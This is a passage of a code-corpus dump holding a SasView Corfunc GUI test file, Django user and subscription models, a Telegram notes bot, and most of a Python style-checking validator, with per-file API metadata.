"line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "41467451408", "text": "import os\nimport sys\n\nimport pytest\n\nfrom PySide6 import QtGui, QtWidgets\nfrom PySide6 import QtCore\nfrom PySide6.QtTest import QTest\n\nfrom sas.qtgui.Perspectives.Corfunc.CorfuncPerspective import CorfuncWindow\nfrom sas.qtgui.Plotting.PlotterData import Data1D\nfrom sasdata.dataloader.loader import Loader\nfrom sas.qtgui.MainWindow.DataManager import DataManager\nimport sas.qtgui.Utilities.GuiUtils as GuiUtils\n\n\nclass CorfuncTest:\n '''Test the Corfunc Interface'''\n\n @pytest.fixture(autouse=True)\n def widget(self, qapp, mocker):\n '''Create/Destroy the CorfuncWindow'''\n class MainWindow(object):\n def __init__(self, widget):\n self.model = QtGui.QStandardItemModel()\n\n class dummy_manager(object):\n def __init__(self, widget):\n self.filesWidget = MainWindow()\n\n def communicator(self, widget):\n return GuiUtils.Communicate()\n\n def communicate(self, widget):\n return GuiUtils.Communicate()\n\n w = CorfuncWindow(dummy_manager())\n reference_data1 = Data1D(x=[0.1, 0.2, 0.3, 0.4, 0.5], y=[1000, 1000, 100, 10, 1], dy=[0.0, 0.0, 0.0, 0.0, 0.0])\n reference_data1.filename = \"Test A\"\n mocker.patch.object(GuiUtils, 'dataFromItem', return_value=reference_data1)\n self.fakeData = QtGui.QStandardItem(\"test\")\n\n yield w\n\n w.close()\n\n @pytest.mark.xfail(reason=\"2022-09 already broken\")\n def testDefaults(self, widget):\n '''Test the GUI in its default state'''\n assert isinstance(widget, QtWidgets.QWidget)\n assert widget.windowTitle() == \"Corfunc Perspective\"\n assert widget.model.columnCount() == 1\n assert widget.model.rowCount() == 16\n assert widget.txtLowerQMin.text() == '0.0'\n assert not widget.txtLowerQMin.isEnabled()\n assert widget.txtFilename.text() == ''\n assert widget.txtLowerQMax.text() == '0.01'\n assert widget.txtUpperQMin.text() == '0.20'\n assert widget.txtUpperQMax.text() == '0.22'\n assert widget.txtBackground.text() == '0'\n assert widget.txtGuinierA.text() == '0.0'\n assert widget.txtGuinierB.text() == '0.0'\n assert widget.txtPorodK.text() == '0.0'\n assert 
widget.txtPorodSigma.text() == '0.0'\n        assert widget.txtAvgCoreThick.text() == '0'\n        assert widget.txtAvgIntThick.text() == '0'\n        assert widget.txtAvgHardBlock.text() == '0'\n        assert widget.txtPolydisp.text() == '0'\n        assert widget.txtLongPeriod.text() == '0'\n        assert widget.txtLocalCrystal.text() == '0'\n\n    @pytest.mark.xfail(reason=\"2022-09 already broken\")\n    def testOnCalculate(self, widget, mocker):\n        \"\"\" Test onCompute function \"\"\"\n        mocker.patch.object(widget, 'calculate_background')\n        widget.cmdCalculateBg.setEnabled(True)\n        QTest.mouseClick(widget.cmdCalculateBg, QtCore.Qt.LeftButton)\n        widget.calculate_background.assert_called_once()\n\n    @pytest.mark.xfail(reason=\"2022-09 already broken - input file issue\")\n    def testProcess(self, widget, mocker):\n        \"\"\"Test the full analysis path\"\"\"\n\n        filename = os.path.join(\"UnitTesting\", \"ISIS_98929.txt\")\n        try:\n            os.stat(filename)\n        except OSError:\n            assert False, \"ISIS_98929.txt does not exist\"\n        f = Loader().load(filename)\n        mocker.patch.object(QtWidgets.QFileDialog, 'getOpenFileName', return_value=(filename, ''))\n\n        #assert widget.txtFilename.text() == filename\n\n        assert float(widget.txtBackground.text()) == 0.0\n\n        widget.txtLowerQMin.setText(\"0.01\")\n        widget.txtLowerQMax.setText(\"0.20\")\n        widget.txtUpperQMax.setText(\"0.22\")\n\n        QTest.mouseClick(widget.cmdCalculateBg, QtCore.Qt.LeftButton)\n\n\n        #TODO: All the asserts when Calculate is clicked and file properly loaded\n        #assert float(widget.txtBackground.text()) > 0.2\n\n        #widget.extrapolateBtn.click()\n        #assert float(widget.txtGuinierA.text()) > 1\n        #assert float(widget.txtGuinierB.text()) < -10000\n        #assert float(widget.txtPorodK.text()) > 10\n        #assert float(widget.txtPorodSigma.text()) > 10\n\n        #################################################\n        # The testing framework does not seem to handle\n        # multi-threaded Qt. 
Signals emitted from threads\n        # are not detected when run in the unittest, even\n        # though they ARE handled in the actual application.\n        #################################################\n        # sleep(1)\n        # widget.transformBtn.click()\n        # while float(widget.longPeriod.text()) == 0.0:\n        #     print(\"Waiting\")\n        #     sleep(1)\n        # assert float(widget.longPeriod.text()) > 10\n        # assert float(widget.polydisp.text()) > 0\n        # assert float(widget.localCrystal.text()) > 0\n        # assert float(widget.longPeriod.text()) > float(widget.avgHardBlock.text()) > 0\n        # assert float(widget.longPeriod.text()) > float(widget.avgIntThick.text()) > 0\n        # assert float(widget.longPeriod.text()) > float(widget.avgCoreThick.text()) > 0\n\n    @pytest.mark.xfail(reason=\"2022-09 already broken\")\n    def testSerialization(self, widget):\n        \"\"\" Serialization routines \"\"\"\n        widget.setData([self.fakeData])\n        assert hasattr(widget, 'isSerializable')\n        assert widget.isSerializable()\n        self.checkFakeDataState(widget)\n        data = GuiUtils.dataFromItem(widget._model_item)\n        data_id = str(data.id)\n        # Test three separate serialization routines\n        state_all = widget.serializeAll()\n        state_one = widget.serializeCurrentPage()\n        page = widget.getPage()\n        # Pull out params from state\n        params_dict = state_all.get(data_id)\n        params = params_dict.get('corfunc_params')\n        # Tests\n        assert len(state_all) == len(state_one)\n        assert len(state_all) == 1\n        # getPage should include an extra param 'data_id' removed by serialize\n        assert len(params) != len(page)\n        assert len(params) == 15\n        assert len(page) == 16\n\n    @pytest.mark.xfail(reason=\"2022-09 already broken\")\n    def testRemoveData(self, widget):\n        widget.setData([self.fakeData])\n        self.checkFakeDataState(widget)\n        # Removing something not already in the perspective should do nothing\n        widget.removeData([])\n        self.checkFakeDataState(widget)\n        # Removing the data from the perspective should set it to base state\n        widget.removeData([self.fakeData])\n        # Be sure the defaults hold true after data removal\n        self.testDefaults(widget)\n\n    @pytest.mark.xfail(reason=\"2022-09 already broken\")\n    def testLoadParams(self, widget):\n        widget.setData([self.fakeData])\n        self.checkFakeDataState(widget)\n        pageState = widget.getPage()\n        widget.updateFromParameters(pageState)\n        self.checkFakeDataState(widget)\n        widget.removeData([self.fakeData])\n        self.testDefaults(widget)\n\n    def checkFakeDataState(self, widget):\n        assert widget.txtFilename.text() == 'data'\n        assert widget.txtLowerQMin.text() == '0.0'\n        assert not widget.txtLowerQMin.isEnabled()\n        assert widget.txtLowerQMax.text() == '0.01'\n        assert widget.txtUpperQMin.text() == '0.20'\n        assert widget.txtUpperQMax.text() == '0.22'\n        assert widget.txtBackground.text() == '0'\n        assert widget.txtGuinierA.text() == ''\n        assert widget.txtGuinierB.text() == ''\n        assert widget.txtPorodK.text() == ''\n        assert widget.txtPorodSigma.text() == ''\n        assert widget.txtAvgCoreThick.text() == ''\n        assert widget.txtAvgIntThick.text() == ''\n        assert widget.txtAvgHardBlock.text() == ''\n        assert widget.txtPolydisp.text() == ''\n        assert widget.txtLongPeriod.text() == ''\n        assert widget.txtLocalCrystal.text() == ''\n", "repo_name": "SasView/sasview", "sub_path": "src/sas/qtgui/Perspectives/Corfunc/UnitTesting/CorfuncTest.py", "file_name": "CorfuncTest.py", "file_ext": "py", "file_size_in_byte": 7904, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 44, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PySide6.QtGui.QStandardItemModel", "line_number": 25, "usage_type": 
"call"}, {"api_name": "PySide6.QtGui", "line_number": 25, "usage_type": "name"}, {"api_name": "sas.qtgui.Utilities.GuiUtils.Communicate", "line_number": 32, "usage_type": "call"}, {"api_name": "sas.qtgui.Utilities.GuiUtils", "line_number": 32, "usage_type": "name"}, {"api_name": "sas.qtgui.Utilities.GuiUtils.Communicate", "line_number": 35, "usage_type": "call"}, {"api_name": "sas.qtgui.Utilities.GuiUtils", "line_number": 35, "usage_type": "name"}, {"api_name": "sas.qtgui.Perspectives.Corfunc.CorfuncPerspective.CorfuncWindow", "line_number": 37, "usage_type": "call"}, {"api_name": "sas.qtgui.Plotting.PlotterData.Data1D", "line_number": 38, "usage_type": "call"}, {"api_name": "sas.qtgui.Utilities.GuiUtils", "line_number": 40, "usage_type": "argument"}, {"api_name": "PySide6.QtGui.QStandardItem", "line_number": 41, "usage_type": "call"}, {"api_name": "PySide6.QtGui", "line_number": 41, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 20, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QWidget", "line_number": 50, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets", "line_number": 50, "usage_type": "name"}, {"api_name": "pytest.mark.xfail", "line_number": 47, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 47, "usage_type": "attribute"}, {"api_name": "PySide6.QtTest.QTest.mouseClick", "line_number": 77, "usage_type": "call"}, {"api_name": "PySide6.QtTest.QTest", "line_number": 77, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 77, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore", "line_number": 77, "usage_type": "name"}, {"api_name": "pytest.mark.xfail", "line_number": 72, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 86, "usage_type": "call"}, {"api_name": "sasdata.dataloader.loader.Loader", "line_number": 89, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QFileDialog", "line_number": 90, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets", "line_number": 90, "usage_type": "name"}, {"api_name": "PySide6.QtTest.QTest.mouseClick", "line_number": 100, "usage_type": "call"}, {"api_name": "PySide6.QtTest.QTest", "line_number": 100, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 100, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore", "line_number": 100, "usage_type": "name"}, {"api_name": "pytest.mark.xfail", "line_number": 80, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 80, "usage_type": "attribute"}, {"api_name": "sas.qtgui.Utilities.GuiUtils.dataFromItem", "line_number": 137, "usage_type": "call"}, {"api_name": "sas.qtgui.Utilities.GuiUtils", "line_number": 137, "usage_type": "name"}, {"api_name": "pytest.mark.xfail", "line_number": 130, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 130, "usage_type": "attribute"}, {"api_name": "pytest.mark.xfail", "line_number": 154, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 154, "usage_type": "attribute"}, {"api_name": "pytest.mark.xfail", "line_number": 166, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 166, "usage_type": "attribute"}]} +{"seq_id": "23254698900", "text": "from django.conf import settings\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom django.db.models 
import F, Q, UniqueConstraint\n\n\nclass User(AbstractUser):\n    \"\"\"User model.\"\"\"\n    first_name = models.CharField(\n        'Имя',\n        max_length=settings.STRING_FIELD_LENGTH,\n        blank=False,\n    )\n    last_name = models.CharField(\n        'Фамилия',\n        max_length=settings.STRING_FIELD_LENGTH,\n        blank=False,\n    )\n    username = models.CharField(\n        'Имя пользователя',\n        max_length=settings.STRING_FIELD_LENGTH,\n    )\n    email = models.EmailField(\n        'Почта',\n        max_length=settings.EMAIL_FIELD_LENGTH,\n        unique=True)\n    USERNAME_FIELD = 'email'\n    REQUIRED_FIELDS = ['first_name', 'last_name', 'username']\n\n    class Meta:\n        verbose_name = 'Пользователь'\n        verbose_name_plural = 'Пользователи'\n        ordering = ('username',)\n\n    def __str__(self):\n        return self.username\n\n\nclass Subscription(models.Model):\n    \"\"\"Subscription model.\"\"\"\n    user = models.ForeignKey(\n        User,\n        on_delete=models.CASCADE,\n        related_name='follower',\n        verbose_name='Подписчик',\n    )\n    author = models.ForeignKey(\n        User,\n        on_delete=models.CASCADE,\n        related_name='author',\n        verbose_name='Автор')\n\n    class Meta:\n        verbose_name = 'Подписка'\n        verbose_name_plural = 'Подписки'\n        constraints = [\n            UniqueConstraint(\n                fields=['user', 'author'],\n                name='unique_subscriptions',\n            ),\n            models.CheckConstraint(\n                check=~Q(user=F('author')),\n                name='no_self_follow')]\n        ordering = ('author_id',)\n\n    def __str__(self):\n        return f'{self.user} подписан на {self.author}'\n", "repo_name": "JustSiddy/foodgram-project-react", "sub_path": "backend/users/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1954, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.auth.models.AbstractUser", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 9, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.settings.STRING_FIELD_LENGTH", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.conf.settings.STRING_FIELD_LENGTH", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 16, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.conf.settings.STRING_FIELD_LENGTH", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.EmailField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.conf.settings.EMAIL_FIELD_LENGTH", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 41, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 41, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 43, 
"usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 43, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 47, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 47, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 49, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 49, "usage_type": "name"}, {"api_name": "django.db.models.UniqueConstraint", "line_number": 57, "usage_type": "call"}, {"api_name": "django.db.models.CheckConstraint", "line_number": 61, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 61, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 62, "usage_type": "call"}, {"api_name": "django.db.models.F", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "42318876762", "text": "from app.config import BOT_API\nfrom markUp import startMenu\nfrom app.db import User, Task, create_all_db\n\nimport telebot\nimport datetime\nbot = telebot.TeleBot(BOT_API)\nuser = User()\ntask = Task()\ncreate_all_db()\n\n@bot.message_handler(commands=['help', 'start'])\ndef send_welcome(message):\n\n user.name = message.chat.username\n user.role = 'user'\n user.tg_id = str(message.chat.id)\n user.user_is_register(str(message.chat.id))\n\n bot.send_message(message.chat.id, '''Привет, {}! \nЭто мой первый бот!\nid :{}'''.format(message.chat.username, message.chat.id), reply_markup=startMenu)\n\n\n@bot.callback_query_handler(func=lambda callback:True)\ndef callback_message(callback):\n if callback.data == 'add_new_task':\n task.date_of_creation = str(datetime.datetime.now().date())\n task.executor_id = user.get_id_by_tg_id(callback.message.chat.id)\n print(user.get_id_by_tg_id(callback.message.chat.id))\n bot.send_message(callback.message.chat.id, 'Введите дату окончания вашей заметки')\n bot.register_next_step_handler(callback.message, add_execute_date)\n \n elif callback.data == 'all_my_task': \n all_tasks = user.get_all_users_task(callback.message.chat.id)\n for tasks in all_tasks.values():\n bot.send_message(callback.message.chat.id, '''Дата создания : {}, \nДата окончания: {},\nОписание: {}'''.format(tasks['date_of_creation'], tasks['execution_date'], tasks['description']))\n\ndef add_execute_date(message):\n task.execution_date = str(message.text)\n bot.send_message(message.chat.id, 'Введите описание вашей заметки')\n bot.register_next_step_handler(message, add_desctiption)\n\ndef add_desctiption(message):\n task.description = str(message.text)\n print(task)\n task.create_task()\n bot.send_message(message.chat.id, 'Задание успешно добавлено', reply_markup=startMenu)\n\nbot.polling(non_stop=True)", "repo_name": "AlexandrYar/notes_bot", "sub_path": "app/bot/bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 2021, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "telebot.TeleBot", "line_number": 7, "usage_type": "call"}, {"api_name": "app.config.BOT_API", "line_number": 7, "usage_type": "argument"}, {"api_name": "app.db.User", "line_number": 8, "usage_type": "call"}, {"api_name": "app.db.Task", "line_number": 9, "usage_type": "call"}, {"api_name": "app.db.create_all_db", "line_number": 10, "usage_type": "call"}, {"api_name": "markUp.startMenu", "line_number": 22, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, 
"usage_type": "attribute"}, {"api_name": "markUp.startMenu", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "22788876888", "text": "import sys\nimport argparse\nimport re\nimport configparser\nimport errors.error as err\nfrom errors.error import Error\nfrom collections import deque\n\nBIN_OPERATORS1 = ('==', '=', '+=', '-=', '*=', '/=', '<=', '>=', '<', '>')\nBIN_OPERATORS2 = ('in', 'is', 'and', 'or', 'not')\nBIN_OPERATORS = BIN_OPERATORS1 + BIN_OPERATORS2\nARITHMETIC_OPERATORS = ('=', '+', '-', '*', '/')\nPUNCTUATION_MARKS = (',', ';', ':')\nBOOL_TYPES = ('True', 'False')\nOPENED_BRACKETS = ('(', '[', '{')\nCLOSED_BRACKETS = (')', ']', '}')\nBRACKETS = OPENED_BRACKETS + CLOSED_BRACKETS\nSTART_WORDS = ('def', 'class', 'if', 'while', 'for')\nQUOTES = ('\"', \"'\")\n\n\nclass Validator:\n def __init__(self, text, is_file=False):\n self.text = text\n self.is_file = is_file\n self.inline_checkers = [self.check_error0101, self.check_error0102,\n self.check_error0201, self.check_error0202,\n self.check_error0203, self.check_error0301,\n self.check_error0302, self.check_error0401,\n self.check_error0501, self.check_error0601,\n self.check_error0701, self.check_error0702,\n self.check_error0703, self.check_error0704,\n self.check_error0705, self.check_error0706,\n self.check_error0707, self.check_error0801,\n self.check_error0903, self.check_error0904,\n self.check_error0906]\n self.global_checkers = [self.check_error0901, self.check_error0905]\n self.line_number = 1\n self.errors_found = []\n self.bracket_stack = []\n self.in_class = False\n self.previous_lines = deque()\n\n def search_errors(self):\n if self.is_file:\n try:\n with open(self.text) as file:\n for line in file:\n for checker in self.inline_checkers:\n checker(line)\n self.previous_lines.append(line)\n if len(self.previous_lines) > 3:\n self.previous_lines.popleft()\n self.line_number += 1\n except FileNotFoundError:\n print('No such file: \"{}\"'.format(self.text))\n sys.exit(1)\n except Exception:\n print('May be your code in file {} have some syntax errors'\n .format(self.text))\n else:\n for checker in self.inline_checkers:\n checker(self.text)\n for checker in self.global_checkers:\n checker()\n self.errors_found.sort(key=lambda x: x.coordinates)\n\n def get_space_count(self, line):\n for (i, ch) in enumerate(line):\n if ch != ' ' and ch not in QUOTES:\n return i\n\n def is_in_quotes(self, line, index):\n in_single = False\n in_double = False\n for i in range(len(line)):\n symbol = line[i]\n if symbol == \"'\" and not in_double:\n in_single = not in_single\n if symbol == '\"' and not in_single:\n in_double = not in_double\n if i == index:\n return in_single or in_double\n\n def is_in_quadratic_bracket(self, line, index):\n in_bracket = False\n for i in range(len(line)):\n symbol = line[i]\n if symbol == \"[\":\n in_bracket = True\n if symbol == ']':\n in_bracket = False\n if i == index:\n return in_bracket\n\n def is_in_bracket(self, line, index):\n in_bracket = False\n for i in range(len(line)):\n symbol = line[i]\n if symbol == \"(\":\n in_bracket = True\n if symbol == ')':\n in_bracket = False\n if i == index:\n return in_bracket\n\n def is_for_parameter(self, line, index):\n bracket_indicator = 0\n for i in range(len(line)):\n symbol = line[i]\n if not self.is_in_quotes(line, i):\n if symbol == '(':\n bracket_indicator += 1\n elif symbol == ')':\n bracket_indicator -= 1\n if i == index:\n return bracket_indicator > 0\n\n def get_all_occurrences(self, sub, string):\n indexes = []\n start = 0\n while string.find(sub, 
start) != -1:\n start = string.find(sub, start) + 1\n indexes.append(start - 1)\n return indexes\n\n def check_error0101(self, line):\n if not is_space_count_multiple_four(line) and \\\n len(self.bracket_stack) == 0:\n self.errors_found.append(Error((self.line_number, 1), 'E0101'))\n\n def check_error0102(self, line):\n if self.bracket_stack:\n spaces = self.get_space_count(line)\n sub = line.lstrip()\n if sub[0] in QUOTES:\n spaces -= 1\n index = -1\n if self.bracket_stack[-1] != spaces-1:\n if spaces-1 == line[:re.search('\\S', line).start()]\\\n .count(' ')+4:\n self.errors_found.append(Error((self.line_number, spaces),\n 'E0102'))\n for i in range(len(line)):\n symbol = line[i]\n if symbol in OPENED_BRACKETS and not self.is_in_quotes(line, i):\n self.bracket_stack.append(i)\n elif symbol in CLOSED_BRACKETS and \\\n not self.is_in_quotes(line, i):\n self.bracket_stack.pop()\n\n def check_error0201(self, line):\n words = line.split()\n if words and words[0] == 'class':\n if len(words) == 1:\n self.errors_found.append(Error((self.line_number,\n line.find(words[0]) +\n len('class')),\n 'E0201'))\n elif not is_cap_word(words[1]):\n self.errors_found.append(Error((self.line_number,\n line.find(words[1])),\n 'E0201'))\n\n def check_error0202(self, line):\n words = line.split()\n if words and words[0] == 'def':\n if len(words) == 1:\n self.errors_found.append(Error((self.line_number,\n line.find(words[0]) +\n len('def')),\n 'E0202'))\n if not words[1].islower():\n self.errors_found.append(Error((self.line_number,\n line.find(words[1])),\n 'E0202'))\n\n def check_error0203(self, line):\n words = line.split()\n if words and words[0] == 'import':\n if not words[1].islower():\n self.errors_found.append(Error((self.line_number,\n line.find(words[1])),\n 'E0203'))\n\n def check_error0301(self, line):\n words = line.split()\n if words and words[0] == 'import':\n if len(words) > 2:\n if words[2] != 'as':\n self.errors_found.append(Error((self.line_number,\n line.find(words[2])),\n 'E0301'))\n\n def check_error0302(self, line):\n i = line.find(' lambda ')\n if i == -1:\n for mark in PUNCTUATION_MARKS:\n i = line.find(mark)\n if mark == ',':\n i = -1\n if i != -1:\n if not self.is_in_quotes(line, i) and \\\n not self.is_in_quadratic_bracket(line, i) and \\\n i + 1 < len(line.rstrip()) \\\n and not self.is_in_bracket(line, i):\n self.errors_found.append(Error((self.line_number, i),\n 'E0302'))\n\n def check_error0401(self, line):\n line = line.lstrip()\n i = line.find('#')\n if i != -1:\n if line[i + 1] != ' ' and not self.is_in_quotes(line, i):\n self.errors_found.append(Error((self.line_number, i),\n 'E0401'))\n\n def check_error0501(self, line):\n for boolean in BOOL_TYPES:\n line_without_spaces = line.replace(' ', '')\n i = line_without_spaces.find(boolean)\n operators = ('==', '!=', 'is', 'isnot')\n if i != -1:\n for operator in operators:\n if line_without_spaces[i - 2:i] == operator or \\\n line_without_spaces[i - 5:i] == operator:\n self.errors_found.append(Error((self.line_number, i),\n 'E0501'))\n\n def check_error0601(self, line):\n if len(line) > 79:\n self.errors_found.append(Error((self.line_number, 79), 'E0601'))\n\n def check_error0701(self, line):\n words = line.split()\n next_word = ''\n symbol_index = len(line)-len(line.lstrip())\n for i in range(len(words)):\n if i + 1 < len(words):\n next_word = words[i + 1]\n if words[i][-1] in OPENED_BRACKETS and \\\n i + 1 < len(words) and next_word not in BIN_OPERATORS:\n self.errors_found.append(Error((self.line_number,\n 
symbol_index+len(words[i])+1),\n 'E0701'))\n symbol_index += len(words[i])+1\n\n def check_error0702(self, line):\n words = line.split()\n previous_word = ''\n symbol_index = len(line)-len(line.lstrip())\n for i in range(len(words)):\n index = line.find(words[i])\n if words[i][0] == OPENED_BRACKETS and \\\n not self.is_in_quotes(line, index) and \\\n len(previous_word) > 0 and previous_word[-1] != ',' and \\\n previous_word not in BIN_OPERATORS:\n self.errors_found.append(Error((self.line_number,\n symbol_index+len(words[i])+1),\n 'E0702'))\n previous_word = words[i]\n symbol_index += len(words[i])+1\n\n def check_error0703(self, line):\n words = line.split()\n previous_word = ''\n symbol_index = len(line)-len(line.lstrip())\n for i in range(len(words)):\n if words[i][0] in CLOSED_BRACKETS and \\\n len(previous_word) > 0 and previous_word[-1] != ',' and \\\n previous_word not in BIN_OPERATORS:\n self.errors_found.append(Error((self.line_number,\n symbol_index+len(words[i])+1),\n 'E0703'))\n previous_word = words[i]\n symbol_index += len(words[i])+1\n\n def check_error0704(self, line):\n words = line.split()\n previous_word = ''\n symbol_index = len(line) - len(line.lstrip())\n for i in range(len(words)):\n if words[i][0] in PUNCTUATION_MARKS and \\\n len(previous_word) > 0 and previous_word[-1] != ',' and \\\n previous_word not in BIN_OPERATORS:\n self.errors_found.append(Error((self.line_number,\n symbol_index+len(words[i])+1),\n 'E0704'))\n previous_word = words[i]\n\n def check_error0705(self, line):\n # Unexpected spaces around keyword / parameter equals\n indexes = self.get_all_occurrences('=', line)\n for index in indexes:\n if not self.is_in_quotes(line, index) and \\\n self.is_for_parameter(line, index) and\\\n line[index-1] != '=' and line[index-1] != '!' and\\\n line[index+1] != '=':\n if line[index - 1] == ' ':\n i = 2\n while line[index - i] == ' ':\n i += 1\n self.errors_found.append(Error((self.line_number,\n index - i + 2),\n 'E0705'))\n if line[index + 1] == ' ':\n i = 2\n while line[index + i] == ' ':\n i += 1\n self.errors_found.append(Error((self.line_number,\n index + i),\n 'E0705'))\n\n # Missing whitespace around operator\n def check_error0706(self, line):\n for operator in BIN_OPERATORS2:\n indexes = self.get_all_occurrences(operator, line)\n for index in indexes:\n if line[index] and not line[index - 1].isalpha() and \\\n not line[index + len(operator)].isalpha() and \\\n line[index - 1] not in ARITHMETIC_OPERATORS and \\\n not self.is_in_quotes(line, index):\n if (line[index - 1] == ')' or line[index - 1] == '(')\\\n and line[index:index+3] != 'not':\n self.errors_found.append(Error((self.line_number,\n index - 1),\n 'E0706'))\n if line[index + len(operator)] == ')' or \\\n line[index + len(operator)] == ')':\n self.errors_found.append(Error((self.line_number,\n index+len(operator)),\n 'E0706'))\n for operator in BIN_OPERATORS1:\n indexes = self.get_all_occurrences(operator, line)\n for index in indexes:\n if line[index - 1] not in ARITHMETIC_OPERATORS and \\\n line[index - 1] != '!' 
and \\\n line[index - 1] != '>' and \\\n line[index - 1] != '<' and \\\n line[index - 1] != '=' and \\\n line[index + 1] != '=' and \\\n not self.is_in_quotes(line, index) and \\\n not self.is_for_parameter(line, index) and \\\n len(self.bracket_stack) > 0:\n if line[index - 1] != ' ':\n self.errors_found.append(Error((self.line_number,\n index - 1),\n 'E0706'))\n if line[index + len(operator)] != ' ':\n self.errors_found.append(Error((self.line_number,\n index +\n len(operator) + 1),\n 'E0706'))\n\n def check_error0707(self, line):\n line = line.lstrip()\n for operator in BIN_OPERATORS:\n indexes = self.get_all_occurrences(operator, line)\n for index in indexes:\n if line[index - 1] not in ARITHMETIC_OPERATORS and \\\n not self.is_in_quotes(line, index):\n if line[index - 1] == ' ':\n if line[index - 2] == ' ':\n i = 2\n while line[index - i] == ' ':\n i += 1\n self.errors_found.append(Error((self.line_number,\n i),\n 'E0707'))\n if line[index + len(operator)] == ' ':\n if line[index + len(operator) + 1] == ' ':\n i = len(operator) + 1\n while line[index + 1] == ' ':\n i += 1\n self.errors_found.append(Error((self.line_number,\n index + i),\n 'E0707'))\n\n def check_error0801(self, line):\n indexes = self.get_all_occurrences(' lambda ', line)\n for i in indexes:\n if not self.is_in_quotes(line, i):\n self.errors_found.append(Error((self.line_number, i),\n 'E0801'))\n\n def check_error0901(self):\n if self.is_file and self.previous_lines[-1][-1] != '\\n':\n self.errors_found.append(Error((self.line_number, 0), 'E0901'))\n\n def check_error0902(self, line):\n if line.startswith('class') and \\\n len(self.previous_lines) >= self.line_number:\n if self.previous_lines[self.line_number - 1] != ' ' and \\\n self.previous_lines[self.line_number - 2] != ' ' and \\\n self.previous_lines[self.line_number - 3] == ' ':\n self.errors_found.append(Error((self.line_number,\n line.find('class')), 'E0902'))\n\n def check_error0903(self, line):\n if (line.startswith('def') or line.startswith('class'))\\\n and self.line_number > 2:\n if not (self.previous_lines[-1].isspace() and\n self.previous_lines[-2].isspace()):\n self.errors_found.append(Error((self.line_number, 1),\n 'E0903'))\n elif self.line_number > 3 and self.previous_lines[-3].isspace():\n self.errors_found.append(Error((self.line_number, 1),\n 'E0903'))\n\n def check_error0904(self, line):\n if (line.lstrip().startswith('def') and self.line_number > 2 and\n not self.previous_lines[-1].lstrip().startswith('class') and\n not self.previous_lines[-1].lstrip().startswith('def') and\n not self.previous_lines[-1].lstrip().startswith('#') and\n re.match('\\s', line)):\n if not self.previous_lines[-1].isspace() or\\\n self.previous_lines[-2].isspace():\n self.errors_found.append(Error((self.line_number,\n str.find('def', line)+1),\n 'E0904'))\n\n def check_error0905(self):\n if self.is_file and self.previous_lines[-1] == '\\n' and \\\n self.previous_lines[-2][-1] == '\\n':\n self.errors_found.append(Error((self.line_number, 1), 'E0905'))\n\n def check_error0906(self, line):\n if (re.match('\\S', line.lstrip()) and self.line_number > 2 and\n self.previous_lines[-1].isspace() and\n 